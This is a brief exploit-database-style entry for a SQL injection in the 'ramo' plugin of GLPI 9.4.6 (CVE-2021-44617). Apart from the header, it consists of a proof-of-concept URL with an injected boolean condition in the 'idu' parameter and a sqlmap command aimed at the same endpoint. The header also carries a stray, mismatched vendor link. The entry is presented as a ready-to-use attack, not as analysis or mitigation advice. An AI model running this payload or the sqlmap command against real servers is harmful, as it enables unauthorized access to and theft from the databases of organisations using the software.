# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi # Date: 10/12 # Exploit Author: Joas Antonio # Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/ # Software Link: https://glpi-project.org/pt-br/baixar/ # Version: GLPI - 9.4.6 # Tested on: Windows/Linux # CVE : CVE-2021-44617 #POC1: plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111 sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"